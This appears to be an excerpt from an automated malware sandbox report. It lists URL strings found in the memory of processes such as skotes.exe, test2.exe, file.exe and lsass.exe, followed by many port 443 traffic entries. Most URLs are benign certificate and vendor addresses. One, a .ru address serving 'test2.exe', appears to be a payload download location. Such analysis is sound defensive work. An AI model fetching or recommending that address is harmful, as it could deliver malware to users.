Source: lsass.exe, 00000035.00000000.2534214023.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2947441669.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2947441669.00000202C03A0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2940927699.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2533434102.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 00000035.00000000.2534593077.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2949177986.00000202C0400000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: skotes.exe, 0000000C.00000002.2950396161.0000000001469000.00000004.00000020.00020000.00000000.sdmp, test2.exe, 0000000D.00000003.2527135675.000001C7F7BD0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: skotes.exe, 0000000C.00000002.2950396161.0000000001469000.00000004.00000020.00020000.00000000.sdmp, test2.exe, 0000000D.00000003.2527135675.000001C7F7BD0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: test2.exe, 0000000D.00000003.2527135675.000001C7F7BD0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: lsass.exe, 00000035.00000000.2534214023.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000003.2576254792.00000202C037D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2534214023.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2534099834.00000202C037F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: lsass.exe, 00000035.00000000.2534214023.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2943405206.00000202C024E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2533690910.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2947441669.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: lsass.exe, 00000035.00000000.2534214023.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2534214023.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: lsass.exe, 00000035.00000000.2534214023.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2947441669.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2947441669.00000202C03A0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2940927699.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2533434102.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000035.00000000.2534593077.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2949177986.00000202C0400000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: skotes.exe, 0000000C.00000002.2950396161.0000000001469000.00000004.00000020.00020000.00000000.sdmp, test2.exe, 0000000D.00000003.2527135675.000001C7F7BD0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: lsass.exe, 00000035.00000000.2534214023.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000003.2576254792.00000202C037D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2534214023.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2534099834.00000202C037F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: lsass.exe, 00000035.00000002.2940927699.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2533434102.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 00000035.00000002.2943008458.00000202C0200000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2533653562.00000202C0200000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 00000035.00000002.2939385215.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2533266756.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 00000035.00000002.2939843685.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2533303286.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 00000035.00000002.2939385215.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2533266756.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: svchost.exe, 00000002.00000003.1761107695.0000021654418000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: svchost.exe, 00000002.00000003.1761107695.0000021654418000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: svchost.exe, 00000002.00000003.1761107695.0000021654418000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: svchost.exe, 00000002.00000003.1761107695.0000021654418000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000002.00000003.1761107695.0000021654418000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000002.00000003.1761107695.0000021654418000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000002.00000003.1761107695.000002165444D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 0000003E.00000002.2970891983.000001D559F53000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: skotes.exe, 0000000C.00000002.2950396161.000000000144D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mncrafter.ru/test2.exe#=
Source: skotes.exe, 0000000C.00000002.2950396161.000000000144D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mncrafter.ru/test2.exev=
Source: skotes.exe, 0000000C.00000002.2950396161.0000000001469000.00000004.00000020.00020000.00000000.sdmp, test2.exe, 0000000D.00000003.2527135675.000001C7F7BD0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2534214023.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2534214023.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2534593077.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2947441669.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2947441669.00000202C03A0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2949177986.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2940927699.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2533303286.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2533434102.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 00000035.00000000.2534214023.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2943405206.00000202C024E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2533690910.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2947441669.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: skotes.exe, 0000000C.00000002.2950396161.0000000001469000.00000004.00000020.00020000.00000000.sdmp, test2.exe, 0000000D.00000003.2527135675.000001C7F7BD0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: skotes.exe, 0000000C.00000002.2950396161.0000000001469000.00000004.00000020.00020000.00000000.sdmp, test2.exe, 0000000D.00000003.2527135675.000001C7F7BD0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: lsass.exe, 00000035.00000000.2534214023.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000003.2576254792.00000202C037D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2534214023.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2534099834.00000202C037F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0H
Source: lsass.exe, 00000035.00000000.2534593077.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2949177986.00000202C0400000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0I
Source: skotes.exe, 0000000C.00000002.2950396161.0000000001469000.00000004.00000020.00020000.00000000.sdmp, test2.exe, 0000000D.00000003.2527135675.000001C7F7BD0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: lsass.exe, 00000035.00000000.2534214023.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2943405206.00000202C024E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000003.2576254792.00000202C037D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2533690910.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2534099834.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2947441669.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2947030961.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000003.2712200459.00000202C037E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000003.2922816943.00000202C037D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: lsass.exe, 00000035.00000002.2939385215.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2533266756.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 00000035.00000002.2939385215.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2533266756.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: lsass.exe, 00000035.00000002.2939843685.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2939385215.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2533266756.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2533303286.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: lsass.exe, 00000035.00000002.2939385215.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2533266756.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 00000035.00000002.2939385215.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2533266756.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 00000035.00000002.2939385215.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2533266756.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: skotes.exe, 0000000C.00000002.2950396161.0000000001469000.00000004.00000020.00020000.00000000.sdmp, test2.exe, 0000000D.00000003.2527135675.000001C7F7BD0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2534593077.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2949177986.00000202C0400000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: lsass.exe, 00000035.00000000.2534214023.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000003.2576254792.00000202C037D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2534214023.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2534099834.00000202C037F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0~
Source: file.exe, file.exe, 00000000.00000002.2032674785.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2025179872.000000001D9BC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2032225915.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: file.exe, 00000000.00000003.1848296542.00000000016BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.2028498077.00000000239F2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1998156221.0000000001664000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: file.exe, 00000000.00000002.2028498077.00000000239F2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1998156221.0000000001664000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: file.exe, 00000000.00000003.1848296542.00000000016BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1848296542.00000000016BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1848296542.00000000016BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.2028498077.00000000239F2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1998156221.0000000001664000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: file.exe, 00000000.00000002.2028498077.00000000239F2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1998156221.0000000001664000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000003.1848296542.00000000016BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1848296542.00000000016BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.1848296542.00000000016BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 0000003E.00000002.2970891983.000001D559F53000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: svchost.exe, 0000003E.00000002.2970891983.000001D559F53000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod
Source: svchost.exe, 00000002.00000003.1761107695.0000021654456000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 0000003E.00000002.2970891983.000001D559F53000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdC:
Source: svchost.exe, 0000003E.00000002.2970891983.000001D559F53000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: svchost.exe, 00000002.00000003.1761107695.00000216544A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1761107695.0000021654507000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1761107695.00000216544F4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1761107695.00000216544C2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1761107695.00000216544E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000002.00000003.1761107695.00000216544C2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000003E.00000002.2970891983.000001D559F53000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: svchost.exe, 0000003E.00000002.2970891983.000001D559F53000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96C:
Source: svchost.exe, 0000003E.00000002.2970891983.000001D559F53000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2C:
Source: file.exe, 00000000.00000002.1998156221.0000000001664000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: svchost.exe, 00000002.00000003.1761107695.00000216544C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: svchost.exe, 0000003E.00000002.2970891983.000001D559F53000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exeC:
Source: svchost.exe, 0000003E.00000002.2970891983.000001D559F53000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exeEEVJ
Source: svchost.exe, 00000002.00000003.1761107695.0000021654456000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: file.exe, 00000000.00000003.1908958326.0000000023C21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000003.1908958326.0000000023C21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: file.exe, 00000000.00000003.1839776268.000000001D8BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1997064501.0000000000337000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: file.exe, 00000000.00000002.1997064501.0000000000337000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
Source: file.exe, 00000000.00000003.1839776268.000000001D8BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1997064501.0000000000337000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: file.exe, 00000000.00000002.1997064501.0000000000337000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
Source: svchost.exe, 0000003E.00000003.2800434031.000001D5599A5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yq
Source: file.exe, 00000000.00000002.2028498077.00000000239F2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1998156221.0000000001664000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: file.exe, 00000000.00000003.1848296542.00000000016BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000002.2028498077.00000000239F2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1998156221.0000000001664000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: file.exe, 00000000.00000003.1848296542.00000000016BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000002.1997064501.0000000000337000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: file.exe, 00000000.00000002.1997064501.0000000000337000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/EGDHJKEBGCBA
Source: file.exe, 00000000.00000002.1997064501.0000000000337000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/dHh0
Source: file.exe, 00000000.00000003.1908958326.0000000023C21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: file.exe, 00000000.00000002.1997064501.0000000000337000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: file.exe, 00000000.00000002.1997064501.0000000000337000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0
Source: file.exe, 00000000.00000003.1908958326.0000000023C21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: file.exe, 00000000.00000002.1997064501.0000000000337000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.1908958326.0000000023C21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000002.1997064501.0000000000337000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000002.1997064501.0000000000337000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.1908958326.0000000023C21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000002.1997064501.0000000000337000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
Source: file.exe, 00000000.00000002.1997064501.0000000000337000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/s:

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 50039 -> 443
